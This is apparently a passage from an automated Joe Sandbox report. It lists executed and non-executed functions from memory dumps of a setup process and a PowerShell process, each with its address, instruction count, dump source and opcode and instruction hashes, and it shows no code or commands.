                                                                                                                                                                                                                                  • Instruction ID: b7307d84259814765a246e98b80633b29c64f1a9a569f2ddcdcfdec4da46c868
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: d75e4e44ceafceb02e1b7b200a1a1146d0a61b8cbc1b3268c50ce9a49a4ff901
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 65E08C606496914BD7841A7889E11BBBFE1C753221F15597CD2E2D3181D06C8486966A
                                                                                                                                                                                                                                  Function 007BC6FB Relevance: .0, Instructions: 20COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2077777234.00000000007B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 007B0000, based on PE: false
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7b0000_setup.jbxd
                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                  • Opcode ID: 606581a47d7df36f34e41e311434d61695aa73c945a63277c38267a446534f2d
                                                                                                                                                                                                                                  • Instruction ID: 36edb9c8603f0f2693683fb1e13d5fcff25e8e442b7a096ecc8af2051b164e94
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 606581a47d7df36f34e41e311434d61695aa73c945a63277c38267a446534f2d
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 68E0C271500601DBD738CF24CC45E76B27AAB83320F05C71CA0118B1E8DB34E4508B68
                                                                                                                                                                                                                                  Function 007D4B92 Relevance: .0, Instructions: 17COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2077777234.00000000007B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 007B0000, based on PE: false
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7b0000_setup.jbxd
                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                  • Opcode ID: 4c765c56afbab89adce3b91aa2f21b1db36572e218bd99bec5990d92c48af48b
                                                                                                                                                                                                                                  • Instruction ID: ce1ae2a1107b9069e8e0d8ce87296d56f5e1653657ea4ba905ccb4fef8ede3d3
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 4c765c56afbab89adce3b91aa2f21b1db36572e218bd99bec5990d92c48af48b
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 6DD01236B14410CBC341EF58EDE695DB3B4FF17601F48685594E1E7205C728D6054B5F
                                                                                                                                                                                                                                  Function 007D6F4F Relevance: .0, Instructions: 13COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2077777234.00000000007B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 007B0000, based on PE: false
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7b0000_setup.jbxd
                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                  • Opcode ID: 17a541a6d152f7000e196ba3562fb73851827dd95982a29436cb11caab27a2b7
                                                                                                                                                                                                                                  • Instruction ID: e0113454d59c0aa18e1fba275a12e44cf4d0c06f4b23f70b085ca7d7e69e15b6
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 17a541a6d152f7000e196ba3562fb73851827dd95982a29436cb11caab27a2b7
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 65D012B180C3908FC3068F14D060175BFF0AA4B314F0968ACE4C8AB322C270E841CF0E
                                                                                                                                                                                                                                  Function 007D9714 Relevance: .0, Instructions: 11COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2077777234.00000000007B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 007B0000, based on PE: false
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7b0000_setup.jbxd
                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                  • Opcode ID: 3a6470ebb34247305cd39b241ee7fb1ae6640368fb97567402084e8697f7d190
                                                                                                                                                                                                                                  • Instruction ID: 5b0bdee6b8c3bdce941a12d284f7333441af36771757322614efcce17baadf59
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 3a6470ebb34247305cd39b241ee7fb1ae6640368fb97567402084e8697f7d190
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 7AB09B74D08290C7C611DF145441576B1755747104F146560D56967321D625DC119699
                                                                                                                                                                                                                                  Function 007D27F0 Relevance: .0, Instructions: 11COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2077777234.00000000007B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 007B0000, based on PE: false
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7b0000_setup.jbxd
                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                  • Opcode ID: 1eea1194c07932b3d45482237d4d5ed539e02f4c88fcf7e1f67307a091384b04
                                                                                                                                                                                                                                  • Instruction ID: e27c52e4b055b98c566065731cafd9488733da1e6dbac1b79d4f5b3601cd871c
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 1eea1194c07932b3d45482237d4d5ed539e02f4c88fcf7e1f67307a091384b04
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: D9B092A1C03420E6E0112F102D065EAB0664913200F0420B0EA1B22202A61EE25A40AF
                                                                                                                                                                                                                                  Function 007D49A4 Relevance: .0, Instructions: 9COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2077777234.00000000007B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 007B0000, based on PE: false
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7b0000_setup.jbxd
                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                  • Opcode ID: 5be063d2346dea39aeb1fc82abf2c1bd6866d00a5148a53d7f705a2093280fa3
                                                                                                                                                                                                                                  • Instruction ID: 728cf2d0bbc34878e6af63056b22c96cfb19df8dafbc254fb3bf6b5a2218d8bc
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 5be063d2346dea39aeb1fc82abf2c1bd6866d00a5148a53d7f705a2093280fa3
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: CAB09270A1C2018A8300CF10A610076E2B552CF241F20A8258089A3208E234D8054A5A
                                                                                                                                                                                                                                  Function 007D49AD Relevance: .0, Instructions: 8COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2077777234.00000000007B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 007B0000, based on PE: false
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7b0000_setup.jbxd
                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                  • Opcode ID: 99b30445efadc7ce3007d94267be341406133a640d528a6e4b361b9d8ca11cda
                                                                                                                                                                                                                                  • Instruction ID: 5de0add0ddaee50fd447fc7e6c5d5177b51e0bc39828dc06e2757ebfbb939e34
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 99b30445efadc7ce3007d94267be341406133a640d528a6e4b361b9d8ca11cda
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 14B09274A082008FC300CF04E140465F3B4A78F201F10A014D048A3220D330D8058A4A
                                                                                                                                                                                                                                  Function 007D4BBD Relevance: .0, Instructions: 8COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2077777234.00000000007B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 007B0000, based on PE: false
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7b0000_setup.jbxd
                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                  • Opcode ID: 3b63a9a0e3f20c12b5ec4f5bcd4f548dd49c37f6fbbdea6a6194c5a306282196
                                                                                                                                                                                                                                  • Instruction ID: afa058da326e0a04069ce494bfb3bbeeeb0abb5d4b02b28d84586c3668ed05c2
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 3b63a9a0e3f20c12b5ec4f5bcd4f548dd49c37f6fbbdea6a6194c5a306282196
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 09B01238B08200CFC200CF00C581936F3B5FBCB204F30F100C01823215C330E8018A4D
                                                                                                                                                                                                                                  Function 007F1491 Relevance: .0, Instructions: 7COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2077777234.00000000007B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 007B0000, based on PE: false
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7b0000_setup.jbxd
                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                  • Opcode ID: 7a2089f1a63bc10ca86dae7c670fbab48f66bcfffb2a77eafa6cdd0d02f6be95
                                                                                                                                                                                                                                  • Instruction ID: 893bd63e22e0e82fa42e4043a5fb804187e284add9fc6960cadbd57982b84ab1
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 7a2089f1a63bc10ca86dae7c670fbab48f66bcfffb2a77eafa6cdd0d02f6be95
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 22A00278EDC401869708CF60A954671E2B96B6F201F5134688009B7551D555D410951E
                                                                                                                                                                                                                                  Function 007EAF64 Relevance: .0, Instructions: 6COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2077777234.00000000007B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 007B0000, based on PE: false
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7b0000_setup.jbxd
                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                  • Opcode ID: 15c72f4979e3566fb882167d07b99e0d6ca07ba4c5422aa121bea941912548d0
                                                                                                                                                                                                                                  • Instruction ID: 84838423ff07a18aea6d46761997e0febbb29570daeb7598de829a8a2adc12cc
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 15c72f4979e3566fb882167d07b99e0d6ca07ba4c5422aa121bea941912548d0
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: C4900224D881409AC101CF049440471F2B8720B201F1038509008F3016C351D804950C

                                                                                                                                                                                                                                  Executed Functions

                                                                                                                                                                                                                                  Function 07DF1798 Relevance: 17.1, Strings: 13, Instructions: 813COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000004.00000002.2026592960.0000000007DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07DF0000, based on PE: false
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_4_2_7df0000_powershell.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                  • String ID: 4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$tP^q$tP^q$$^q$$^q$$^q$k$k
                                                                                                                                                                                                                                  • API String ID: 0-2260618432
                                                                                                                                                                                                                                  • Opcode ID: ee6fa658ea361497e21dfd3624c9556f16b44b6f116bf7dae5bb9ac2708e7063
                                                                                                                                                                                                                                  • Instruction ID: c89a46077207794aec39fa9207a5ddf86600ef47ced9032c1e5f7d8b160cddd1
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: ee6fa658ea361497e21dfd3624c9556f16b44b6f116bf7dae5bb9ac2708e7063
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 234227B2B04219CFC7259B6898106AAFBA2AFC6310F1684BBD645CF351DB37CD45C7A1
                                                                                                                                                                                                                                  Function 03704900 Relevance: 1.3, Strings: 1, Instructions: 67COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000004.00000002.2014215548.0000000003700000.00000040.00000800.00020000.00000000.sdmp, Offset: 03700000, based on PE: false
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_4_2_3700000_powershell.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                  • String ID: ;o^
                                                                                                                                                                                                                                  • API String ID: 0-3117013240
                                                                                                                                                                                                                                  • Opcode ID: 4007afec51e0b2d477b401d17d01f2dc11c69a8213694ecca3eeb92fbb246cc5
                                                                                                                                                                                                                                  • Instruction ID: 125d185899138aea51830df41099b0c0c8b540c69ee781700cd93bd7f88055bb
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 4007afec51e0b2d477b401d17d01f2dc11c69a8213694ecca3eeb92fbb246cc5
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: CD215C74A0424ADFCB04CF5DD8909AABBF4FF49310B1581A9D958EB392C735ED41CBA1
                                                                                                                                                                                                                                  Function 03702F68 Relevance: .5, Instructions: 474COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000004.00000002.2014215548.0000000003700000.00000040.00000800.00020000.00000000.sdmp, Offset: 03700000, based on PE: false
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_4_2_3700000_powershell.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                  • Opcode ID: 96fd11807ba4c65d439e8830fdc64f46aa80c210eede8b3fcf8ff7a08dec40b3
                                                                                                                                                                                                                                  • Instruction ID: 15cc061c9dd5149ba4092f8c5f241f92405286c23040b7e11eb33012628e208c
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 96fd11807ba4c65d439e8830fdc64f46aa80c210eede8b3fcf8ff7a08dec40b3
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: BB120874A00249DFDB05CFA8C584AADFBF2BF48310F298599E445AB3A5C735ED81CB90
                                                                                                                                                                                                                                  Function 07DF1A54 Relevance: .1, Instructions: 119COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000004.00000002.2026592960.0000000007DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07DF0000, based on PE: false
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_4_2_7df0000_powershell.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                  • Opcode ID: 4e83c76b61b97c4a0307b6e24f8da2923d59e58977714a6ba3cbefc0c5032765
                                                                                                                                                                                                                                  • Instruction ID: 4c02978bd92a66ef00776e773abaa8441567c3cdc5231fd347669a8674476bff
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 4e83c76b61b97c4a0307b6e24f8da2923d59e58977714a6ba3cbefc0c5032765
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: FF41FAF1A1120ACFCB249E649A41A66FBA2AF41350F1B80E6DB009F355D73BD885C7E1
                                                                                                                                                                                                                                  Function 037033E0 Relevance: .1, Instructions: 109COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000004.00000002.2014215548.0000000003700000.00000040.00000800.00020000.00000000.sdmp, Offset: 03700000, based on PE: false
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_4_2_3700000_powershell.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                  • Opcode ID: 88fa90b6463dc6212cd25f12d15ab3385faf6f853ab52d606c50fc3efcc4de61
                                                                                                                                                                                                                                  • Instruction ID: 32b85584ca04ec776141ea802c36aa76fa7cefc5a1198b81ec7cfaa32cd9da3c
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 88fa90b6463dc6212cd25f12d15ab3385faf6f853ab52d606c50fc3efcc4de61
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 104105B4A00645DFDB06CF98C1949AEFBB1FF48310B158599D805AB3A5C736ED51CFA0
                                                                                                                                                                                                                                  Function 07DF1A68 Relevance: .1, Instructions: 109COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000004.00000002.2026592960.0000000007DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07DF0000, based on PE: false
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_4_2_7df0000_powershell.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                  • Opcode ID: e2d85f311f97a0ca97a15e8a66611f18c4cc9f8a6957fe0e3e61dfdb1bfedc02
                                                                                                                                                                                                                                  • Instruction ID: d4ea0f5966c18f7bbba8ee5593d5a831cca090c469a5073ad01d9af0540dc071
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: e2d85f311f97a0ca97a15e8a66611f18c4cc9f8a6957fe0e3e61dfdb1bfedc02
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 9F31EBF1B0020ACBCB249E649641A66FBE2AF81350F1680E5DB049F355D737D881C7E1
                                                                                                                                                                                                                                  Function 037033F0 Relevance: .1, Instructions: 102COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000004.00000002.2014215548.0000000003700000.00000040.00000800.00020000.00000000.sdmp, Offset: 03700000, based on PE: false
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_4_2_3700000_powershell.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                  • Opcode ID: ff8ac588ff1d1bf85c7116eb3e15f64ff3650c6d6dc6b3248b123c0830ff35be
                                                                                                                                                                                                                                  • Instruction ID: 393c146931aa29636add760b508a86103017d8065a8a6ef27ab0aab7cbbb7314
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: ff8ac588ff1d1bf85c7116eb3e15f64ff3650c6d6dc6b3248b123c0830ff35be
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 7C4104B4A00509DFDB0ACF98C1949AEFBB1FF48310B258199D905AB3A5C736FD51CBA0
                                                                                                                                                                                                                                  Function 03702AA0 Relevance: .1, Instructions: 74COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000004.00000002.2014215548.0000000003700000.00000040.00000800.00020000.00000000.sdmp, Offset: 03700000, based on PE: false
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_4_2_3700000_powershell.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                  • Opcode ID: ea06bc4ce939ac6e423533bbf0dcc45bee962d55c86b75f2eedb5830dc1638c5
                                                                                                                                                                                                                                  • Instruction ID: ec026fb53e6d928357d968a203301e06dfb0a2ef7495f926f2999d6081d85635
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: ea06bc4ce939ac6e423533bbf0dcc45bee962d55c86b75f2eedb5830dc1638c5
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 952117B5A00209DFCB00CF59C9849AAFBF1FB48310B148596E819EB366D735EC41CBA0
                                                                                                                                                                                                                                  Function 03702A99 Relevance: .1, Instructions: 64COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000004.00000002.2014215548.0000000003700000.00000040.00000800.00020000.00000000.sdmp, Offset: 03700000, based on PE: false
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_4_2_3700000_powershell.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                  • Opcode ID: 196a7ead079b6bf2119797d8dfc9c3a0850f537f9f3b06b4cb776d4076797892
                                                                                                                                                                                                                                  • Instruction ID: 865fd94dd14bc5fc362ec6b6ca3362220acdf8f87b5126d019044ee7247f0d49
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 196a7ead079b6bf2119797d8dfc9c3a0850f537f9f3b06b4cb776d4076797892
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: CE21E375A00509DFCB00CF99C9849AAFBF5FB48310B2485A9E909A7362C731EC51CBA0
                                                                                                                                                                                                                                  Function 037048F1 Relevance: .1, Instructions: 63COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000004.00000002.2014215548.0000000003700000.00000040.00000800.00020000.00000000.sdmp, Offset: 03700000, based on PE: false
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_4_2_3700000_powershell.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                  • Opcode ID: 8bc079f6979ddd3f6b6ca35b43ff2b42d410c185eb3faf6bdf8a240405c5a4a9
                                                                                                                                                                                                                                  • Instruction ID: 8325912ee8f63bb65b01411064564a139edc28552bf9ad4f7c3e2f19a51b4a04
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 8bc079f6979ddd3f6b6ca35b43ff2b42d410c185eb3faf6bdf8a240405c5a4a9
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: C0210974A04249CFCB00CF99D4809AEBBF0FF89310B1485A9D559AB351C731EC41CFA0
                                                                                                                                                                                                                                  Function 0362D006 Relevance: .0, Instructions: 47COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000004.00000002.2013682375.000000000362D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0362D000, based on PE: false
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_4_2_362d000_powershell.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                  • Opcode ID: 3adcea27700ba90137cf7bd764b40ca2e583bf8675be99c9876a0ec14d34d4b8
                                                                                                                                                                                                                                  • Instruction ID: 9227bf8bc4e7a13195b34c5a1d3c9667216e38956bdb3f26e254674583e86ead
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 3adcea27700ba90137cf7bd764b40ca2e583bf8675be99c9876a0ec14d34d4b8
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 9301576200D3D09ED7128B258994752BFA8EF47224F0D84DBE8988F2A7C2689845CB72
                                                                                                                                                                                                                                  Function 0362D01D Relevance: .0, Instructions: 45COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000004.00000002.2013682375.000000000362D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0362D000, based on PE: false
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_4_2_362d000_powershell.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                  • Opcode ID: dd2406b2278be3ce93a648d1a4ffa2e867d3640c4723746205cfd5828a86ba0b
                                                                                                                                                                                                                                  • Instruction ID: d678f68056778d7250469b275236427614587c51aa98f9c95ea0a04e42810be5
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: dd2406b2278be3ce93a648d1a4ffa2e867d3640c4723746205cfd5828a86ba0b
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: BE01F731008750AAE710CE25CA84B67FF98EF45364F0CC469EC684A296C279D882CAB1

                                                                                                                                                                                                                                  Non-executed Functions

                                                                                                                                                                                                                                  Function 07DF08A0 Relevance: 12.8, Strings: 10, Instructions: 315COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000004.00000002.2026592960.0000000007DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07DF0000, based on PE: false
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_4_2_7df0000_powershell.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                  • String ID: 4'^q$4'^q$tP^q$tP^q$#j$$^q$$^q$$^q$k$k
                                                                                                                                                                                                                                  • API String ID: 0-2299674365
                                                                                                                                                                                                                                  • Opcode ID: 30f1fb2a75896084e5ee66c1891efd40577f6c97c66aef0918dee4dd00574455
                                                                                                                                                                                                                                  • Instruction ID: 164e98a088267041723a19d09a4a7dd93907661cbed08967ab89ddac6abdf73b
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 30f1fb2a75896084e5ee66c1891efd40577f6c97c66aef0918dee4dd00574455
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: B2A168B27043468FD7245A38981066AFFE59FC2210F2A84BBD645CF363EB36C845C7A1
                                                                                                                                                                                                                                  Function 07DF3D70 Relevance: 9.2, Strings: 7, Instructions: 432COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
